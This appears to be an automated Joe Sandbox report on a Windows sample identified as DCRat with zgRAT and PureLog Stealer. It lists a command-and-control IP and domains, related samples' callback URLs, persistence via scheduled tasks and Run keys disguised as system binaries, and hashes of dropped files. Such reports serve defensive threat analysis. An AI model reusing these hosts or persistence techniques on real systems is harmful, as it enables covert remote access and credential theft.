                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drfalse
                                                    		high
                                                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000034.00000003.1866084978.0000025729353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1866084978.0000025729398000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1866084978.00000257293B7000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drfalse
                                                        		high
                                                        https://www.ecosia.org/newtab/gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drfalse
                                                          		high
                                                          https://github.com/Pester/Pesterpowershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ac.ecosia.org/autocomplete?q=gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drfalse
                                                              		high
                                                              https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000034.00000003.1866084978.00000257293CA000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drfalse
                                                                		high
                                                                http://www.w3.RuntimeBroker.exe, 00000029.00000002.2602749504.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000034.00000003.1866084978.0000025729372000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drfalse
                                                                    		high
                                                                    https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000034.00000003.1866084978.0000025729372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchgbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000016.00000002.1851720872.000001B880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1923272794.000001F65EBD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1864937137.000001F2A1DF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1911427610.00000297C7708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894522833.0000025A41158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://contoso.com/powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000016.00000002.3045203135.000001B890078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3239915515.000001F66EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3090748741.000001F2B1C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3078390875.0000025A50FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://aka.ms/pscore68powershell.exe, 00000016.00000002.1851720872.000001B880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1923272794.000001F65E9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1864937137.000001F2A1BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1911427610.00000297C74E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894522833.0000025A40F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1866487790.00000234D2C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/names5duotgoYD.exe, 00000000.00000002.1759280751.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1851720872.000001B880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1923272794.000001F65E9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1864937137.000001F2A1BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1911427610.00000297C74E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894522833.0000025A40F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1866487790.00000234D2C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://crl.vpowershell.exe, 0000001B.00000002.1897890945.00000297C7390000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drfalse
                                                                                      		high
                                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000034.00000003.1866084978.0000025729372000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        37.44.238.250
                                                                                        		500154cm.n9shteam.inFrance
                                                                                        		49434HARMONYHOSTING-ASFRtrue

                                                                                        Private

                                                                                        IP
                                                                                        127.0.0.1

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1554055
                                                                                        Start date and time:2024-11-12 00:41:08 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 9m 33s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:56
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:s5duotgoYD.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:B379F4AC167609D8A3EF26444098B61D.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.spre.troj.spyw.expl.evad.winEXE@48/304@1/2
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 33.3%
                                                                                        HCA Information:Failed
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, schtasks.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target RuntimeBroker.exe, PID 8240 because it is empty
                                                                                        • Execution Graph export aborted for target backgroundTaskHost.exe, PID 9136 because it is empty
                                                                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                        • VT rate limit hit for: s5duotgoYD.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        18:42:06API Interceptor167x Sleep call for process: powershell.exe modified
                                                                                        18:42:16API Interceptor2024881x Sleep call for process: RuntimeBroker.exe modified
                                                                                        18:42:18API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                        23:42:03Task SchedulerRun new task: backgroundTaskHost path: "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                                                                                        23:42:04Task SchedulerRun new task: backgroundTaskHostb path: "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                                                                                        23:42:04Task SchedulerRun new task: conhost path: "C:\Windows\ModemLogs\conhost.exe"
                                                                                        23:42:04Task SchedulerRun new task: conhostc path: "C:\Windows\ModemLogs\conhost.exe"
                                                                                        23:42:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
                                                                                        23:42:05Task SchedulerRun new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
                                                                                        23:42:05Task SchedulerRun new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
                                                                                        23:42:05Task SchedulerRun new task: s5duotgoYD path: "C:\Users\user\Desktop\s5duotgoYD.exe"
                                                                                        23:42:05Task SchedulerRun new task: s5duotgoYDs path: "C:\Users\user\Desktop\s5duotgoYD.exe"
                                                                                        23:42:06Task SchedulerRun new task: xKVBpkhCEjg path: "C:\Recovery\xKVBpkhCEjg.exe"
                                                                                        23:42:06Task SchedulerRun new task: xKVBpkhCEjgx path: "C:\Recovery\xKVBpkhCEjg.exe"
                                                                                        23:42:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Windows\ModemLogs\conhost.exe"
                                                                                        23:42:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjg "C:\Recovery\xKVBpkhCEjg.exe"
                                                                                        23:42:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                                                                                        23:42:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run s5duotgoYD "C:\Users\user\Desktop\s5duotgoYD.exe"
                                                                                        23:42:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
                                                                                        23:43:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Windows\ModemLogs\conhost.exe"
                                                                                        23:43:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjg "C:\Recovery\xKVBpkhCEjg.exe"
                                                                                        23:43:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                                                                                        23:43:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run s5duotgoYD "C:\Users\user\Desktop\s5duotgoYD.exe"
                                                                                        23:43:38AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
                                                                                        23:43:47AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Windows\ModemLogs\conhost.exe"
                                                                                        23:43:55AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjg "C:\Recovery\xKVBpkhCEjg.exe"
                                                                                        23:44:04AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                                                                                        23:44:13AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run s5duotgoYD "C:\Users\user\Desktop\s5duotgoYD.exe"
                                                                                        23:44:30AutostartRun: WinLogon Shell "C:\Recovery\RuntimeBroker.exe"
                                                                                        23:44:38AutostartRun: WinLogon Shell "C:\Windows\ModemLogs\conhost.exe"

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        37.44.238.250QMT2731i8k.exeGet hashmaliciousDCRatBrowse
                                                                                        • 117813cm.n9shteam.in/ExternalRequest.php
                                                                                        EQdhBjQw4G.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
                                                                                        3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
                                                                                        HcEvQKWAu2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
                                                                                        k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                                                                        • 452132cm.n9shteam2.top/Processdownloads.php
                                                                                        FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
                                                                                        cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
                                                                                        qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • rollsroys.top/externaljsapisql.php
                                                                                        QDJA9geR12.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • merlion.top/PythongameTrafficDatalifepublic.php
                                                                                        Q9AQFOA6YC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 492668cm.newnyash.top/ToSecureLowProcessordefaultDatalifeCentral.php

                                                                                        Domains

                                                                                        No context

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        HARMONYHOSTING-ASFRQMT2731i8k.exeGet hashmaliciousDCRatBrowse
                                                                                        • 37.44.238.250
                                                                                        EQdhBjQw4G.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 37.44.238.250
                                                                                        3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 37.44.238.250
                                                                                        HcEvQKWAu2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 37.44.238.250
                                                                                        k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                                                                        • 37.44.238.250
                                                                                        FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 37.44.238.250
                                                                                        cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 37.44.238.250
                                                                                        qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 37.44.238.250
                                                                                        QDJA9geR12.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 37.44.238.250
                                                                                        Q9AQFOA6YC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 37.44.238.250

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Users\user\Desktop\CjKcCUFn.logQMT2731i8k.exeGet hashmaliciousDCRatBrowse
                                                                                          EQdhBjQw4G.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              TGh6AUbQkh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                                                                                  VfKk5EmvwW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                    cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        9D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                          qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                            Created / dropped Files

                                                                                                            C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1991680
                                                                                                            Entropy (8bit):7.552871211185118
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:qhNLIZG9ZdCvfOqBlRF7kVkHreh1kEGD/5MTgsxjY9gIBiatkZ2hIHirkUP7oM8j:qGfj7rk+CLN9EIshijMX6i5w
                                                                                                            MD5:B379F4AC167609D8A3EF26444098B61D
                                                                                                            SHA1:85FE0BBBE666D72A955EE98444415194E00739EB
                                                                                                            SHA-256:430CBA76BB21F0FF671A5345C15A51BD047B0F5AECF764EF4668AE9085D22B80
                                                                                                            SHA-512:0028141132F1437FF556A00E7CD32298BF561690FD809F361FCFAF9B8837E5A173F4ACB192B25668550E2EC526EA4A518EA46E3FD7C2E1B8FAD1A49D8D6ED0FE
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.................\..........nz... ........@.. ....................................@................................. z..K....... ............................................................................ ............... ..H............text...tZ... ...\.................. ..`.rsrc... ............^..............@....reloc...............b..............@..B................Pz......H........... ....................y.......................................0..........(.... ........8........E........M...)...q...8....(.... ....~....{v...:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8z...*...0..)....... ........8........E................1...V.......8z.......~....(T...~....(X... ....<.... ....8.......... ....~....{....:....& ....8....~....:u... ....~....{|...9o...& ....8d...~....(L... .... .... ....s....~....(P....... ....~

                                                                                                            C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe:Zone.Identifier

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                            C:\Program Files\Windows Portable Devices\eddb19405b7ce1

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with very long lines (950), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):950
                                                                                                            Entropy (8bit):5.904090873642416
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:5jTY88c87QS4vECsPgzfHQvPonNtbPE6z0w9:5jk80UGCsZXonNtH3
                                                                                                            MD5:A652303A27F1F230A23D66BF0840DF54
                                                                                                            SHA1:0A9CF7D86C56D94B9003AA44937C40EE272A50E1
                                                                                                            SHA-256:BC4A1330608A3CD738684BBAA9C1B4847600CD09BB41A387D6863D83733DCA82
                                                                                                            SHA-512:A82D64D612CCEFB2A0D2FCC194363EC6B04E35F2DAAE6027B9386F54924C5AE9D576B03B16F1E9A9F55697F94CE129C8A6B0E3E8FF4ABFF97A2877C4AB98A25C
                                                                                                            Malicious:false
                                                                                                            Preview:t6nz1OEfkAokz4o82H8GtWnXWNKGQHayy6mgScszQjHDq1HuaVs7LrNXTQcoE7Pdjzw2RIpZZJzKOkreGZq5ZdnGtPMC9EuTTod0FOcRpSiB2DIti8hoRUDGMpJC5naUYg0kG0Z26ZQH5lOpGddBhGC8kXoZFZVB1NnWMimsipr1E6Klbd6cJYxSe19sMAwgDOPs72di0vd1YK4oMC8md32cZV1Vi4fi2Ly0rcnjAYlX563T7VgJCKDJVwSmAI96P49NVD7uYYmFSfhdciXMXWgrHoe4JBi1YoHB6p83Yvuni810PzKcuwi3YRFrjCkXzuqnXfgwjeyml3JJwopU1GHlGOmokRUVLXxyROctTY2Q86RfI644XPftmEhJ31LSJcaOFU1iL5BdO0nJ6HgnWZ851ELNrT0bMjGfgDZxEWtbOCevbXNwVi6tdeXBJo02FjRpuHn3rsjAqhqyjZwTGDGonWBBqYoZf1VpvzBTuUEn85D6xibt2gvBdnCXFlNTDKezMBDuYcjv9dprTFNH65g8FTMIwoNIHvjybNuwfrVZ79CA7VDAYFXHngu2z57tPaoN31PGVbmOkHBFQMKblMuBXbK5d17ktlKgVyGGF7p7dIhgeplmufICqn0bqUmddBe86eucFEWnhxiP3oayQUzOdH0s8pZuULdbnjjA4JhpJef2FkhB4yNILQfzoCdZpmTWUGlUFa3GxKF8m7nYIX0g7UPWEtV2pHAgLIi88N6e5GVBLgNqYFRRwwY90PPVEAbpKiwdYoZ5aWl18OLhgodjzsuZtjHt7lZ4pq1nutSuqW0ZLhBmDrzZg1zbxXtzhp7z6qLSWhxwWt3d1VNMiepPv9Yx0Z0XAcNAZBdeVsPg4CDw7WkcJhRC9sD7SYb7raw4g2D01s0zPJVt6lzdzYNcLLBq7gM7RSzdQJQFStkbqcwzXUAqi7

                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8ab47ca3, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1310720
                                                                                                            Entropy (8bit):0.4221481183032556
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
                                                                                                            MD5:16A2D79E7FD613644F2F931BAC749111
                                                                                                            SHA1:22ADE6A70F65A0EA4A97D5A75FAA987CBEE20BB5
                                                                                                            SHA-256:2926390341798067C07F476761129F571F7C87148A76664F21AFE81C01451953
                                                                                                            SHA-512:137BCF1F1C9E822E669EA6D114D92FE82A84A21C7DA3ADC93C0FD589B770842BC3AAC5A27549C8B888E1E626BC1DCCB933ADE41EE3A85A6199A77C5BE337B27C
                                                                                                            Malicious:false
                                                                                                            Preview:..|.... .......A.......X\...;...{......................0.!..........{A..*...|w.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................n[..*...|q...................*7.*...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Recovery\04bb35a44deda9

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):117
                                                                                                            Entropy (8bit):5.5102563097790584
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:y1XReCJq3qQVuj2aJRvbdbTZIx2LoRSOnHQpT1G7OvmzVg:y1ZQVuKUtIx2LoRnwpY7t5g
                                                                                                            MD5:B1395BA64D7F96D287363976F9675311
                                                                                                            SHA1:F5D784219164F7BC8D32AB6C6FB3B716BEB16087
                                                                                                            SHA-256:48EF012F384E02A688B5981891E99053FB5E03ED094226585117E4C86F65DAE1
